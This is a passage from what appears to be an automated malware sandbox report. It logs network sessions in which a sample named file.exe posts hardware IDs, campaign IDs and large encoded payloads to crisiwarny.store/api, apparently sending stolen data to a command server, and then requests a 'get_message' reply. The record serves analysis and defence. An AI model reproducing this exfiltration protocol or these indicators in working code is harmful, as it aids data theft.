2024-10-27 11:13:08 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a Data Ascii: 11ok 173.254.250.90
2024-10-27 11:13:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49708	104.21.95.91	443	1400	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-27 11:13:08 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20572 Host: crisiwarny.store
2024-10-27 11:13:08 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 44 37 35 44 39 31 46 34 35 35 31 41 36 31 39 38 41 38 32 45 36 44 30 42 31 39 45 34 30 32 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7D75D91F4551A6198A82E6D0B19E4023--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-27 11:13:08 UTC	5241	OUT	Data Raw: 5a 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: Z>56vMMZh'F3Wun 4F([:7s~X`nO
2024-10-27 11:13:09 UTC	1011	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 11:13:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=c4c3tali2snodr4rdg8g1gup9b; expires=Thu, 20 Feb 2025 04:59:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=huTA3LtPE82WNxE1q7J9r%2FJyW53Lmkc5AoDDpoJGY4oHAFGJIsuStTchnigwJfUNfJHcOUp20nMJvo8SDaLySiw%2FAUiS9JP3c5WgafYqpFAmHuPXsjt58mKpcRpri%2FSBofLG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d92414f7a7845f9-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1264&sent=11&recv=27&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21534&delivery_rate=2227692&cwnd=238&unsent_bytes=0&cid=8fe5a6a1d0f349a1&ts=680&x=0"
2024-10-27 11:13:09 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a Data Ascii: 11ok 173.254.250.90
2024-10-27 11:13:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49709	104.21.95.91	443	1400	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-27 11:13:10 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1247 Host: crisiwarny.store
2024-10-27 11:13:10 UTC	1247	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 44 37 35 44 39 31 46 34 35 35 31 41 36 31 39 38 41 38 32 45 36 44 30 42 31 39 45 34 30 32 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7D75D91F4551A6198A82E6D0B19E4023--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-27 11:13:11 UTC	1010	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 11:13:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6halhtvscoudm1apvrcr85apun; expires=Thu, 20 Feb 2025 04:59:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZiDX%2BSDxNQr1R%2BotS6zH5xFn1RiDGQkNybzBJzGZemQcvvs6H26Z4sqnEYxdSpkh%2FozAkrHMjqv5qBLTJr7cvnrLQj1vY2Mvf7iqCg%2BidhESQKwVPJ9YwrJ90WBYoR3O4xGx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d92415b2ef82897-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1168&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2164&delivery_rate=2454237&cwnd=251&unsent_bytes=0&cid=adb97b7904f05435&ts=525&x=0"
2024-10-27 11:13:11 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a Data Ascii: 11ok 173.254.250.90
2024-10-27 11:13:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49710	104.21.95.91	443	1400	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-27 11:13:12 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 568574 Host: crisiwarny.store
2024-10-27 11:13:12 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 44 37 35 44 39 31 46 34 35 35 31 41 36 31 39 38 41 38 32 45 36 44 30 42 31 39 45 34 30 32 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7D75D91F4551A6198A82E6D0B19E4023--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-27 11:13:12 UTC	15331	OUT	Data Raw: f9 80 32 b5 7c 4c a3 bc 68 de e1 0b 12 b3 af d7 fa f7 3b 60 80 ca 7c 6d 6f c1 52 bd 02 63 a4 9c a5 34 38 12 96 52 0e 20 80 d8 09 62 ec a1 14 09 a0 34 01 65 35 c2 99 27 5c 19 ae c2 a0 5d 15 0b f3 71 b0 6c 5b 74 78 a6 d8 fa 3e 8e c7 0e f0 d8 77 de 16 0d c2 2b 3a ba bb b1 7d a6 fc 56 ff ff 83 e8 d4 03 80 56 dc 01 e6 f8 40 82 29 25 9f 05 98 7d 7c 30 3f 55 e9 52 66 44 64 99 e5 62 6f 66 39 3f c4 fd 87 68 fc d8 9c c1 25 1a d9 77 da 40 8c 43 32 88 b7 70 48 cd 74 f2 e0 03 cd 8a ab 81 a6 e8 b8 1d cf 9c ca 20 05 35 98 b2 83 57 a2 49 f5 df fa 90 1e 91 f8 09 c1 ad dd 32 34 67 0e 14 3b 52 93 fc 7c 79 52 8d 3b a5 95 44 a9 b6 90 27 0f c1 72 bd 25 c0 c6 8d 3b 5d 52 8a 29 3a 87 99 37 c9 d8 6e 0e 70 55 64 35 38 8b 72 08 6b 8a b5 bd e6 a6 e3 eb 8e 4a 14 12 23 0b 49 74 56 35 Data Ascii: 2\|Lh;`\|moRc48R b4e5'\]ql[tx>w+:}VV@)%}\|0?URfDdbof9?h%w@C2pHt 5WI24g;R\|yR;D'r%;]R):7npUd58rkJ#ItV5
2024-10-27 11:13:12 UTC	15331	OUT	Data Raw: a4 83 36 bd fd e7 d8 5f b9 63 eb 45 ed 26 c0 58 9d ff 12 9a dc 3b 05 8a 09 29 77 99 64 51 9b 89 ed 98 1e 97 c6 f0 80 53 19 11 0f 44 f5 86 6b 5d 23 79 4a 18 58 6d 93 3a 6d a9 26 e2 a8 ca ff 36 a9 c6 ea 8b e5 b3 10 da 36 34 2f 36 b5 e6 e6 0b 4d ff 3e 12 a8 8e 04 55 46 8d ae 1f 71 19 74 35 36 13 c9 4d 65 84 5f 9a 27 2f b9 58 c0 41 a7 c9 78 9f c4 45 6b 95 ea c4 9d 8c 50 a2 e9 33 8b b8 23 68 02 8a 9d 56 bc f2 55 61 bd 4e d2 5d 85 61 38 a9 d4 18 3c 8d 6a 2c af 40 3c 6f 72 be 89 97 c0 1e b5 e2 c4 1a fd 1d 04 16 ed b3 19 c1 8b 2f bf 1c 2b fd ed 5e 58 67 79 f6 0a 8f 96 f9 67 4e 36 43 83 0f 23 c9 39 93 c0 db 93 d6 de ae 88 d0 39 bf 85 fe fe b0 99 b9 b3 b1 59 f3 ef b5 90 f0 6e 5a ae 7b 39 19 45 68 7b 5a fb 7d b3 55 16 f9 9f 3a 6f 11 2c 42 bf 6d 34 ff 29 8a aa ff e3 Data Ascii: 6_cE&X;)wdQSDk]#yJXm:m&664/6M>UFqt56Me_'/XAxEkP3#hVUaN]a8<j,@<or/+^XgygN6C#99YnZ{9Eh{Z}U:o,Bm4)
2024-10-27 11:13:12 UTC	15331	OUT	Data Raw: b9 59 7a 82 10 ac 38 18 16 db 2b 52 a0 3d 22 0d 26 ee 9a 86 67 a7 a6 bc c4 ce 0c 8e 97 0e ea cb c7 84 3b da 1c aa d0 bb 86 29 07 da 35 ed 87 23 25 d6 9d a6 bc 18 5a b0 42 f5 26 63 14 c5 73 13 3d 42 96 04 cb 4e ea a8 06 5d 2f 20 74 41 c4 2d ba 6e e9 a9 4a ea 77 b7 21 96 cd 54 fe 62 ca df fa 0c a9 36 dd 37 f2 60 f0 d2 48 21 f9 fc b2 60 b1 21 63 f8 5b d9 41 42 6d fb 9d ef c3 48 87 fc 15 50 1f 76 d5 e3 d7 90 c2 a7 e1 cc 6a a0 1d ae 9e bd 0b 4d 6b b5 2e 99 e7 6c 3a 7d 94 a4 01 1c db 55 52 e2 31 e9 f1 a8 dc 51 7c e3 b7 ba 9a f7 8e 1c a7 47 9d c7 9a 4a 1f 08 15 86 8c f8 66 4a 5c 89 a5 da d2 e1 b7 2e 8d 97 2b 90 7d 8e 9a 8e ea a4 ba 77 7c a3 d0 ae 0a 7b 24 7f 99 f7 ea 68 d9 64 fc 20 b9 d9 46 8d 72 aa 9d de 60 d2 0f 89 f8 50 b4 d8 c6 43 1b 0b 02 8c d1 f7 0c 9e 35 Data Ascii: Yz8+R="&g;)5#%ZB&cs=BN]/ tA-nJw!Tb67`H!`!c[ABmHPvjMk.l:}UR1Q\|GJfJ\.+}w\|{$hd Fr`PC5
2024-10-27 11:13:12 UTC	15331	OUT	Data Raw: 33 2e 80 9b 9d 2b d5 2a 69 db 44 e9 27 a0 b5 54 ea 6e b0 95 a2 b0 e9 51 32 a8 c9 b0 5f f1 f2 64 be ed 3b c3 24 e3 f1 76 9c e8 54 bc 6a d4 8e 3e f1 41 ed f5 76 19 a2 3d d7 e4 28 85 7d dc d6 93 da d7 12 38 49 f3 f9 72 0c ef bb b2 ab 4b 05 04 1d 51 4e eb 78 d2 60 56 8e f2 51 46 43 58 05 f2 20 ac 70 05 40 4b d8 43 2c 51 f0 83 b7 ed 87 70 0b 31 d8 0d bb 2e cd 41 d6 58 88 a0 47 22 83 a0 eb ee 2a 8d 7c 90 05 b0 57 a1 1c fa fd b6 94 e5 38 e5 e1 59 c5 07 b3 28 65 97 61 76 1e b4 b2 57 88 b9 cb 13 98 62 af 8d 60 99 73 fd 77 77 ef f5 ec cc 15 af bc ba 1b 93 ee 56 c7 1c cf 11 9d 72 4e 88 17 0b 76 c0 cb c8 f6 7d 4b 82 8f 6f c6 ee 68 96 5c 74 d2 23 48 60 2e c4 3a f6 ad 32 02 fd 75 ba e6 6d 2a ac 1c b2 3b 41 b3 e2 e8 f7 1f c2 09 3a 90 ae a9 cb bf 40 7b 03 b5 71 a7 67 fc Data Ascii: 3.+iD'TnQ2_d;$vTj>Av=(}8IrKQNx`VQFCX p@KC,Qp1.AXG"\|W8Y(eavWb`swwVrNv}Koh\t#H`.:2um*;A:@{qg
2024-10-27 11:13:12 UTC	15331	OUT	Data Raw: 86 23 2d 88 8d e7 6e a9 62 58 26 7c 76 df 6a 19 1d 41 b8 42 49 2c 02 01 b8 fc 10 00 fd 1b e1 ee 61 d7 51 fe bd 13 cc e6 89 ca b2 a7 09 28 f4 eb 8d a7 88 cf e0 00 cf 08 d0 64 30 cb 60 f6 d0 dc 63 87 c8 30 1b 88 f6 bc 3c 81 25 fa 13 6e 82 c5 88 47 7b 8f 02 96 bb 4d e8 88 20 08 d4 5b bf 2f e3 29 5f ac 43 80 04 e0 5d b0 05 c2 7a 31 c4 dc 91 62 69 e1 56 7a ce 83 f0 a7 eb 7e 61 83 82 be 87 97 6d e7 2b 7b 76 b9 49 fc cd 7a e2 75 76 ac 15 dd 6a 86 bf ff de b2 0f 78 47 f1 4f e4 a8 15 3a 89 00 37 25 bb 41 b0 41 8e 0a 90 13 67 9f 55 64 7c 11 ff 02 79 47 69 14 94 49 41 d3 9d 4b b2 b1 8c 9e 12 9c 6c ee 19 c4 f0 98 28 b5 6f 7f f7 4e 30 39 a2 84 63 9c 96 90 f8 53 9a fc 4e 94 7a 82 48 5c fe 29 d5 2d 02 84 a5 a3 6f 7d 85 e4 ae 17 b8 11 d0 06 7f 67 d4 51 d4 4e 2c 6a 24 02 Data Ascii: #-nbX&\|vjABI,aQ(d0`c0<%nG{M [/)_C]z1biVz~am+{vIzuvjxGO:7%AAgUd\|yGiIAKl(oN09cSNzH\)-o}gQN,j$
2024-10-27 11:13:12 UTC	15331	OUT	Data Raw: 37 93 5d 17 5e 4e d9 bf 3e fc 05 fb b3 78 e9 ca 73 41 06 9b f3 3e a7 fc 1a 55 44 40 78 3f 73 ed 25 21 ba e7 6c a2 94 eb dc 5b a7 7d ed e1 c5 3b ad e9 ab 37 db 0e 61 2e 3b 22 5d dc e5 44 cc 8b 95 d7 25 f8 38 46 ed 2d bc 6d aa 59 e7 f3 b3 8d 2f 56 96 ae 15 57 dd 77 d1 89 ac ba ba af 6a b5 db f1 fb 6e 12 8b e6 34 0e 0b de 87 6a 9e 04 bc d6 79 fe d6 87 d5 43 65 3a 4a 95 da 7d 69 a1 fc b8 bb 45 96 a2 fa 1f d2 e7 41 ff 7e 77 4b 66 d8 cf 57 d6 91 ab 4e cf 3b 87 73 24 22 57 5f dc f6 12 84 09 ad 3b 33 27 4f 7f 71 30 ed ff 5e 3a 9a 6a 2f f9 c9 ec fb c1 8c ec e1 38 e6 ec 95 48 53 46 8c ec c6 57 a1 96 e3 0b d1 0d 45 6b 0d 6f d7 1b d6 ef 4d 9c 70 7a 27 1c f2 d4 06 e6 5b ee 8e 41 45 a9 6a 48 56 33 71 1b 57 e3 0a f1 12 cf 40 4a a8 23 b4 b0 a7 e0 da c6 29 bf d1 27 55 39 Data Ascii: 7]^N>xsA>UD@x?s%!l[};7a.;"]D%8F-mY/VWwjn4jyCe:J}iEA~wKfWN;s$"W_;3'Oq0^:j/8HSFWEkoMpz'[AEjHV3qW@J#)'U9
2024-10-27 11:13:12 UTC	15331	OUT	Data Raw: bd f7 68 a3 f2 24 7c b0 09 a3 01 9d 7a e3 2e 00 bb 7a 09 57 d0 88 20 0f cb 2d 34 d7 84 d1 15 5e 6a 38 ba c6 54 1d 74 f4 6c 54 17 7c f6 59 9e 70 84 23 86 3e 9f 2d d2 78 07 8e 95 35 59 1b ad ee 50 95 27 63 3b f8 21 27 0e 34 35 96 ee e2 0c ac da 2c a7 0b 03 89 21 d8 6f 07 a5 bd 38 bf b0 e9 09 b8 e4 6d d8 da 00 53 f3 28 ae 88 6e 53 40 93 65 25 08 62 cb d3 fa 82 f9 ce 4d e5 c6 e2 6b 11 f3 73 3c e6 8c 88 e4 2d 1c 30 13 33 cb ec ae a1 8a 3f aa 3b 37 e7 e1 d9 80 35 c5 8d 2b 42 79 1a e8 f1 98 14 be d9 8a 23 8a f2 17 5c 22 36 ce 29 13 05 7e 0c 9c c6 b6 d5 5b 7b c1 8e dc bd 91 64 6d 93 2f 3f ae 28 68 2c 3e f7 84 92 6f 11 26 01 06 ad b4 3e 38 06 aa f1 b5 87 61 ac 86 1d 14 c8 c1 cc 81 fe b2 58 e3 14 ee 39 66 c6 55 f6 5d 53 42 0a 26 28 86 ce 04 84 f7 64 2f 7c ba a9 5a Data Ascii: h$\|z.zW -4^j8TtlT\|Yp#>-x5YP'c;!'45,!o8mS(nS@e%bMks<-03?;75+By#\"6)~[{dm/?(h,>o&>8aX9fU]SB&(d/\|Z
2024-10-27 11:13:12 UTC	15331	OUT	Data Raw: 34 51 5f 43 c4 63 1e e3 dc f7 00 ec 42 83 38 10 9a 8d 18 4f fc 1b ca e3 f9 c0 c7 94 8e 70 ac e9 52 2e e4 1a 43 ad 12 a5 ee 12 2c aa e3 61 dc f2 c9 26 7c 0c 5f 3e 8e ea be 3e 7d d7 74 38 31 08 c9 d3 68 ce ba 79 4d a6 25 aa 30 21 08 71 92 31 e6 c9 2c 3a 9b d0 16 40 da f8 95 97 d6 a5 b9 8b d0 f8 db b2 f4 d3 50 d4 a2 da 6b 8e 18 67 df 52 9c 5c fa 3c 0d 11 9f 35 62 99 e7 e5 91 37 6a 5e 83 c2 e1 16 3c 7b 95 1a f3 3a b8 dd 92 44 02 21 84 03 c1 ce 4b 12 33 51 99 6f 99 3d 50 d1 8b 06 75 c4 a9 fe 8c d3 02 0b fb c4 d5 c5 63 7e 22 71 83 b2 f2 43 51 ab fd 07 3c df 61 4d 15 88 4a ae 91 f1 91 ef f8 86 2b 40 fa 92 6d 9a a4 50 4b d1 cb f6 2d 1e c0 0e e6 1b 74 8a 4d 86 b7 36 89 52 c9 33 6b 67 40 db 21 6c 2d 97 64 fc 6a 6c c4 63 71 2d 7a 31 15 a4 9f c4 d3 8c d1 4b 36 82 a6 Data Ascii: 4Q_CcB8OpR.C,a&\|_>>}t81hyM%0!q1,:@PkgR\<5b7j^<{:D!K3Qo=Puc~"qCQ<aMJ+@mPK-tM6R3kg@!l-djlcq-z1K6
2024-10-27 11:13:12 UTC	15331	OUT	Data Raw: 20 5c 5d f6 b7 95 63 dd 39 2d 82 ff 05 24 c5 47 21 87 c2 7e 1e 32 9e ff e9 af 19 0b df 3b 4c 60 18 00 ba 9f 2a c3 09 49 16 82 bc 0c 3f 6f 77 89 09 3f 51 e3 cd b8 86 81 a5 ff 06 57 9f c4 a0 b1 75 f7 bb 18 8e 7a c1 42 c0 65 5f ac 16 ea 2d a1 b4 2b 5e 92 68 84 d8 b2 39 f3 3a f7 72 4e 2b a4 89 a4 be 52 8c d6 f0 21 2c 6b f0 37 1b 90 16 34 57 47 28 12 18 1a 20 b6 77 96 54 0d 19 8a e1 bb b7 ff bb 6f 7d b9 69 65 76 1b 4f 0d 8c 9a d0 1f 1a ac e0 d8 db e9 f4 93 80 b8 3f 76 e1 ca 30 7e 63 89 6f ad 82 01 3f 25 c5 12 bc 01 02 f5 ef 9e 33 a0 73 17 7e 7f f8 4f 39 d9 c7 75 ab 9a 64 04 d9 08 59 3e 8a fc dd 4f 92 8e 75 22 16 00 e2 6e e1 11 77 d1 25 3c 4f c9 70 99 8b db f0 b7 d2 74 52 88 39 01 c9 36 5c 0c 0d 7d 22 fc 1f 19 c5 da 1b 73 59 c2 2a 75 d8 ce 44 3d 36 c2 08 eb c0 Data Ascii: \]c9-$G!~2;L`I?ow?QWuzBe_-+^h9:rN+R!,k74WG( wTo}ievO?v0~co?%3s~O9udY>Ou"nw%<OptR96\}"sYuD=6
2024-10-27 11:13:14 UTC	1017	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 11:13:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=d1ibi7un77h57jphlmbsms1k7d; expires=Thu, 20 Feb 2025 04:59:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HI4Nqmp%2BeDAIYRyDLjQEI2r1AIH4SNI%2FKuI4SaQ98loLXKYWAaOWCj9pxFeD6o3IjrevajAKbH2CHrIzhOcGej24UKCESfW4aEMGsj5h%2BtFlb7IAItJlv%2FMgENrSSsxQN3Mo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d924166ebb7475b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1048&sent=221&recv=613&lost=0&retrans=0&sent_bytes=2839&recv_bytes=571121&delivery_rate=2683966&cwnd=251&unsent_bytes=0&cid=1bcda24320c625f3&ts=1879&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49711	104.21.95.91	443	1400	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-27 11:13:15 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 87 Host: crisiwarny.store
2024-10-27 11:13:15 UTC	87	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d 26 68 77 69 64 3d 37 44 37 35 44 39 31 46 34 35 35 31 41 36 31 39 38 41 38 32 45 36 44 30 42 31 39 45 34 30 32 33 Data Ascii: act=get_message&ver=4.0&lid=4SD0y4--legendaryy&j=&hwid=7D75D91F4551A6198A82E6D0B19E4023
2024-10-27 11:13:15 UTC	1007	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 11:13:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9nekbk5e6cthp8cbb56i11rbbo; expires=Thu, 20 Feb 2025 04:59:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f4aPTOl4uNLSerkOWuth4UD6RjWD732JB2DjPbTH4tSvuls8cOcgMwiraUFVpp0FvZL%2FhG0Xfu4512hpWgrzFVaaDGcuUgtxMXGTQu%2Bj%2BgbmhduAvbPJ0nrwYYHHcqjCPjGI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9241769acd4758-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1691&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=987&delivery_rate=1684700&cwnd=227&unsent_bytes=0&cid=519b238fa1d0ad93&ts=706&x=0"
2024-10-27 11:13:15 UTC	130	IN	Data Raw: 37 63 0d 0a 65 45 70 68 4b 49 56 42 4b 71 61 36 6a 4a 65 34 58 2f 54 46 57 41 4f 61 6e 6f 31 4b 4d 79 4f 37 42 37 62 48 79 44 38 73 73 6f 34 6a 4d 55 4e 64 70 33 73 49 7a 73 37 34 35 34 49 44 32 35 6c 33 4d 71 4b 72 6f 33 67 43 46 70 55 32 68 2f 54 6d 44 68 72 75 6f 52 63 73 42 33 53 71 4a 55 2f 41 6c 4f 6e 76 33 58 33 59 35 7a 35 33 75 4b 53 39 5a 68 46 47 6d 54 32 47 75 70 55 3d 0d 0a Data Ascii: 7ceEphKIVBKqa6jJe4X/TFWAOano1KMyO7B7bHyD8sso4jMUNdp3sIzs7454ID25l3MqKro3gCFpU2h/TmDhruoRcsB3SqJU/AlOnv3X3Y5z53uKS9ZhFGmT2GupU=
2024-10-27 11:13:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	07:13:00
Start date:	27/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x820000
File size:	3'000'320 bytes
MD5 hash:	84EEAF8B6DAC33D7E5DE9256769CA8C8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
